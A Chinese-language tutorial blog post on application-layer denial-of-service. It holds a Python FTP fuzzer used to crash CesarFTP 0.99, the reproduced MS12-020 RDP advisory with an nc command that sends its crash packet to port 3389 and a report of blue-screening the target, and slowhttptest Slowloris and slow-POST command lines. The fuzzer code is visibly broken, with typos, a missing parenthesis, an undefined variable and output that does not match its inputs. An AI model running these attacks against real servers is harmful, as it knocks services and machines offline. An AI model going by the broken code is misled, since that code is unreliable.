• (八)拒绝服务–应用层DoS 攻击


    1. 简介
    应用服务漏洞
    服务代码存在漏洞,遇异常提交数据时程序崩溃
    应用处理大量并发请求能力有限,被拒绝的是应用或OS
    缓冲区溢出漏洞
    向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存
    影响: 远程代码执行、DOS
    利用模糊测试方法发现缓冲区溢出漏洞
    CesarFTP 0.99 服务漏洞
    server.exe是服务端程序,CesarFTP是配置管理程序。
    打开配置服务端程序,再打开配置管理工具添加账号
    点击进入文件存取权限,指定程序的主目录。
    ftp_fuzz.py # MKD/RMD
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import socket
    import sys
    if len(sys.argv) != 6:
    print “用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]”
    print “举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000”
    ip = str(sys.argv[1])
    port = int(sys.argv[2])
    char = sys.argv[3]
    i = int(sys.argv[4])
    step = int(sys.argv[4])
    max = int(sys.argv[5])
    user = raw_input(str(“FTP账号: “))
    passwd = raw_input(str(“FTP密码: “))
    command = raw_input(str(“FTP命令: “))
    while i <= max:
    try:
    payload = command + ” ” + (char * i)
    print “已发送” + str(i) + “个 (” + char + “)”
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((ip,port))
    s.recv(2014)
    s.send(‘USER’ + user + ‘ ’)
    s.recv(2014)
    s.send(‘PASS’ + passwd + ‘ ’)
    s.recv(2014)
    s.send(payload + ‘ ’)
    s.sned(‘QUIT ’)
    s.recv(2014)
    s.close()
    i = i + step
    except:
    pirnt “ 服务已崩溃”
    sys.exit()
    print “ 未发现缓冲区溢出漏洞”
    [ftp_fuzz1.py]
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import socket
    import sys
    if len(sys.argv) != 6:
    print “用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]”
    print “举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000”
    ip = str(sys.argv[1])
    port = int(sys.argv[2])
    char = sys.argv[3]
    i = int(sys.argv[4]
    step = int(sys.argv[4])
    user = raw_input(str(“FTP账号: “))
    passwd = raw_input(str(“FTP密码: “))
    command = raw_input(str(“FTP命令: “))
    while i <= max:
    try:
    payload = command + ” ” + (‘ ’ * i)
    print “已发送” + str(i) + “个换行符”
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((ip,port))
    s.recv(2014)
    s.send(‘USER’ + user + ‘ ’)
    s.recv(2014)
    s.send(‘PASS’ + passwd + ‘ ’)
    s.recv(2014)
    s.send(payload + ‘ ’)
    s.sned(‘QUIT ’)
    s.recv(2014)
    s.close()
    i = i + step
    except:
    pirnt “ 服务已崩溃”
    sys.exit()
    print “ 未发现缓冲区溢出漏洞”
    root@K:~# ./ftp_fuzz.py
    用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
    举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
    FTP账号:anonymous
    FTP密码:
    FTP命令:MKD
    [ftp_fuzz.py]
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import socket
    import sys
    if len(sys.argv) != 6:
    print “用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]”
    print “举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000”
    ip = str(sys.argv[1])
    port = int(sys.argv[2])
    char = sys.argv[3]
    i = int(sys.argv[4])
    step = int(sys.argv[4])
    user = raw_input(str(“FTP账号: “))
    passwd = raw_input(str(“FTP密码: “))
    command = raw_input(str(“FTP命令: “))
    while i <= max:
    try:
    payload = command + ” ” + (char * i)
    print “已发送” + str(i) + “个 (” + char + “)”
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((ip,port))
    s.recv(2014)
    s.send(‘USER’ + user + ‘ ’)
    s.recv(2014)
    s.send(‘PASS’ + passwd + ‘ ’)
    s.recv(2014)
    s.send(payload + ‘ ’)
    s.sned(‘QUIT ’)
    s.recv(2014)
    s.close()
    i = i + step
    except:
    pirnt “ 服务已崩溃”
    sys.exit()
    print “ 未发现缓冲区溢出漏洞”
    ———————————————————————————–
    root@K:~# ./ftp_fuzz.py
    用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
    举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 A 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:PWD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    已发送800 个 (A)
    已发送900 个 (A)
    已发送1000 个 (A)
    已发送1100 个 (A)
    已发送1200 个 (A)
    已发送1300 个 (A)
    已发送1400 个 (A)
    已发送1500 个 (A)
    已发送1600 个 (A)
    已发送1700 个 (A)
    已发送1800 个 (A)
    服务已崩溃
    root@K:~# ./ftp_fuzz.py192.168.1.127 21 A 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:MKD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    已发送800 个 (A)
    已发送900 个 (A)
    已发送1000 个 (A)
    已发送1100 个 (A)
    已发送1200 个 (A)
    已发送1300 个 (A)
    已发送1400 个 (A)
    已发送1500 个 (A)
    已发送1600 个 (A)
    已发送1700 个 (A)
    已发送1800 个 (A)
    已发送1900 个 (A)
    已发送2000 个 (A)
    未发现缓冲区溢出漏洞
    root@K:~# ./ftp_fuzz.py192.168.1.127 21 ABCD 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:RMD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    两次测试都没有生效,可以登录ftp服务!
    ———————————————————————————–
    [ftp_fuzz1.py]
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import socket
    import sys
    if len(sys.argv) != 6:
    print “用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]”
    print “举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000”
    ip = str(sys.argv[1])
    port = int(sys.argv[2])
    char = sys.argv[3]
    i = int(sys.argv[4]
    step = int(sys.argv[4])
    user = raw_input(str(“FTP账号: “))
    passwd = raw_input(str(“FTP密码: “))
    command = raw_input(str(“FTP命令: “))
    while i <= max:
    try:
    payload = command + ” ” + (‘ ’ * i)
    print “已发送” + str(i) + “个换行符”
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((ip,port))
    s.recv(2014)
    s.send(‘USER’ + user + ‘ ’)
    s.recv(2014)
    s.send(‘PASS’ + passwd + ‘ ’)
    s.recv(2014)
    s.send(payload + ‘ ’)
    s.sned(‘QUIT ’)
    s.recv(2014)
    s.close()
    i = i + step
    except:
    pirnt “ 服务已崩溃”
    sys.exit()
    print “ 未发现缓冲区溢出漏洞”
    ———————————————————————————–
    root@K:~# ./ftp_fuzz.py
    用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
    举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
    FTP账号:anonymous
    FTP密码:
    FTP命令:MKD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    服务端ftp已经报错了!
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
    FTP账号:anonymous
    FTP密码:
    FTP命令:RMD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    wirehark
    ip.addr==192.168.1.127
    root@K:~# searchsploit ms12-020
    —————————————————– ———————————-
    Exploit Title | Path
    | (/usr/share/exploitdb/platforms)
    —————————————————– ———————————-
    Microsoft Terminal Services Use After Free (MS12-020 | ./windwos/dos/18606.txt
    —————————————————– ———————————-
    root@K:~# cp /usr/share/exploitdb/platforms/winodws/dos/18606.txt .
    root@K:~# ls
    18606.txt Documents ftp_fuzz1.py hs_err_pid1982.log Music Public videos
    Desktop Downloads ftp_fuzz.py hs_err_pid2077.log Pictures Templates
    ———————————————————————————–
    root@K:~# geany 181606.txt
    #######################################################################
    Luigi Auriemma
    Application: Microsoft Terminal Services / Remote Desktop Services
    http://www.microsoft.com
    http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
    Versions: any Windows version before 13 Mar 2012
    Platforms: Windows
    Bug: use after free
    Exploitation: remote, versus server
    Date: 16 Mar 2012 (found 16 May 2011)
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
    Additional references:
    http://www.zerodayinitiative.com/advisories/ZDI-12-044/
    http://technet.microsoft.com/en-us/security/bulletin/ms12-020
    #######################################################################
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    #######################################################################
    ===============
    1) Introduction
    ===============
    From vendor’s homepage:
    “The Microsoft Remote Desktop Protocol (RDP) provides remote display
    and input capabilities over network connections for Windows-based
    applications running on a server. RDP is designed to support different
    types of network topologies and multiple LAN protocols.”
    #######################################################################
    ======
    2) Bug
    ======
    The Remote Desktop Protocol is used by the “Terminal Services / Remote
    Desktop Services” and works at kernel level on port 3389.
    There is an use-after-free vulnerability located in the handling of the
    maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of
    the provided proof-of-concept) when set to a value minor/equal than 5.
    The problem happens during the disconnection of the user started with
    RDPWD!NM_Disconnect while the effect of the possible code execution is
    visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on
    Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid
    memory pointer, the following dump is taken from Windows 2003 Server:
    f761887c 8bff mov edi,edi
    f761887e 55 push ebp
    f761887f 8bec mov ebp,esp
    f7618881 56 push esi
    f7618882 57 push edi
    f7618883 8b7d08 mov edi,dword ptr [ebp+8]
    f7618886 8d47ec lea eax,[edi-14h]
    f7618889 50 push eax
    f761888a eb09 jmp termdd!IcaBufferAlloc+0x19 (f7618895)
    f761888c 8b4618 mov eax,dword ptr [esi+18h] ; we are here
    f761888f 833800 cmp dword ptr [eax],0 ; or here
    f7618892 7527 jne termdd!IcaBufferAlloc+0x3f (f76188bb) ; must jump
    f7618894 56 push esi
    f7618895 e878290000 call termdd!IcaGetPreviousSdLink (f761b212) ; the new ESI is returned by this function
    f761889a 8bf0 mov esi,eax
    f761889c 85f6 test esi,esi
    f761889e 75ec jne termdd!IcaBufferAlloc+0x10 (f761888c)
    f76188a0 ff751c push dword ptr [ebp+1Ch]
    f76188a3 ff7518 push dword ptr [ebp+18h]
    f76188a6 ff7514 push dword ptr [ebp+14h]
    f76188a9 ff7510 push dword ptr [ebp+10h]
    f76188ac ff750c push dword ptr [ebp+0Ch]
    f76188af 57 push edi
    f76188b0 e8b9fcffff call termdd!IcaBufferAllocInternal (f761856e)
    f76188b5 5f pop edi
    f76188b6 5e pop esi
    f76188b7 5d pop ebp
    f76188b8 c21800 ret 18h
    f76188bb 33c0 xor eax,eax
    f76188bd 53 push ebx
    f76188be 8d7e10 lea edi,[esi+10h]
    f76188c1 40 inc eax
    f76188c2 f00fc107 lock xadd dword ptr [edi],eax
    f76188c6 ff751c push dword ptr [ebp+1Ch]
    f76188c9 8b4618 mov eax,dword ptr [esi+18h] ; the same value of before
    f76188cc ff7518 push dword ptr [ebp+18h]
    f76188cf ff7514 push dword ptr [ebp+14h]
    f76188d2 ff7510 push dword ptr [ebp+10h]
    f76188d5 ff750c push dword ptr [ebp+0Ch]
    f76188d8 ff761c push dword ptr [esi+1Ch]
    f76188db ff10 call dword ptr [eax] ; code execution
    f76188dd 8bd8 mov ebx,eax
    f76188df 83c8ff or eax,0FFFFFFFFh
    f76188e2 f00fc107 lock xadd dword ptr [edi],eax
    f76188e6 7506 jne termdd!IcaBufferAlloc+0x72 (f76188ee)
    f76188e8 56 push esi
    f76188e9 e8382f0000 call termdd!_IcaUnloadSd (f761b826)
    f76188ee 8bc3 mov eax,ebx
    f76188f0 5b pop ebx
    f76188f1 ebc2 jmp termdd!IcaBufferAlloc+0x39 (f76188b5)
    eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
    eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0 nv up ei pl nz na po nc
    cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
    termdd!IcaBufferAlloc+0x10:
    f762888c 8b4618 mov eax,dword ptr [esi+18h] ds:0023:040b041a=
    ChildEBP RetAddr
    b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
    b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
    b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
    b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
    b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
    b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
    b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
    b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
    b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
    b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
    b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
    b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
    b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
    b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
    b8b39bac f762ca10 termdd!_IcaCallStack+0x55
    b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
    b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
    b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
    b8b39c50 808ed4eb nt!IofCallDriver+0x45
    b8b39c64 808ee28d nt!NtWriteFile+0x2943
    b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
    b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
    b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
    b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14
    On Windows 2003 that zone of the memory pointed by ESI+18 using the
    provided proof-of-concept is ever in the range 040b02-040b04.
    The exploitability depends by the possibility of controlling ESI or the
    content pointed by it (maybe via a form of heap spraying), indeed in
    my quick tests this zone sometimes is allocated and others it isn’t.
    Note that on the post-Vista Windows versions (like 7 and 2008) “seems”
    necessary to have “Allow connections from computers running any version
    of Remote Desktop” for being vulnerable.
    Anyway I’m not totally sure about this so-called limitation because it
    looks like dependent by my proof-of-concept only.
    The provided proof-of-concept uses the BER integer values set at 32bit
    (big endian) in case they could be useful for easier debugging.
    Additional details about the protocol:
    http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
    #######################################################################
    ===========
    3) The Code
    ===========
    http://aluigi.org/poc/termdd_1.dat
    https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18606.dat
    nc SERVER 3389 < termdd_1.dat
    resend it multiple times in case of no results and note that this is
    just a simple proof-of-concept packet to quickly test the bug so it’s
    not optimized at all.
    #######################################################################
    ======
    4) Fix
    ======
    http://technet.microsoft.com/en-us/security/bulletin/ms12-020
    #######################################################################
    ———————————————————————————–
    root@K:~/Downloads# nc 192.168.1.127 3389 < termdd_1.dat
    发了五六次之后,就蓝屏重启了
    再发一次之后,就直接重启了!
    3. Slowhttptest
    Slowhttptest (源自google)
    低带宽应用层慢速DOS攻击(相对于CC等快速攻击而言的慢速)
    最早由Python编写,跨平台支持(Linux、win、Cygwin、OSX)
    尤其擅长攻击apache.tomcat (几乎百发百中)
    攻击方法
    Slowloris、Slow HTTP POST 攻击
    耗尽应用的并发连接池,类似于Http层的Syn flood
    HTTP协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或不完整 服务器时钟为其保留连接资源池占用,此类大量并发将导致DOS
    Slowloris: 完整的http请求结尾是rnirn, 攻击发……
    Slow POST: HTTP头content-length声明长度,但body部分缓慢发送
    攻击方法
    Slow Read attack攻击
    与slowloris and slow POST目的相同,都是耗尽应用的并发连接池
    不同之处在于请求正常发送,但慢速读取响应数据
    攻击者调整TCPwindow窗口大小,是服务器慢速返回数据
    攻击方法
    Apache Range Header attack
    客户端传输大文件时,体积查过HTTP Body大小限制时进行分段
    耗尽服务器CPU、内存资源
    ulimite -n 70000
    HTTP Post 攻击模式
    slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 10000
    slowloris 攻击模式
    slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://10.10.10.132 -x 24 -p 3
    支持代理
    大量应用服务器和安全设备都无法防护慢速攻击
    4. 攻击测试
    root@kali:~# slowhttptest -c 60000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 999999
    -l 设定攻击的时间
    root@kali:~# slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -s 8192 -t GET -u http://192.168.8.158 -x 10 -p 3
    root@kali:~# man slowhttptest
    ulimit -a 显示当前的各种用户进程限制。
  • 相关阅读:
    ffmpeg一些filter使用方法、以及一些功能命令
    Hibernate调试——定位查询源头
    emmet语法
    [心得]传统IT转互联网面试经验分享
    Java中的集合类型的继承关系图
    Java的IO操作中有面向字节(Byte)和面向字符(Character)两种方式
    oracle求时间差的常用函数
    jdbc读取新插入Oracle数据库Sequence值的5种方法
    Xpath语法格式整理
    Oracle中 Instr 这个函数
  • 原文地址:https://www.cnblogs.com/micr067/p/12519778.html
Copyright © 2020-2023  润新知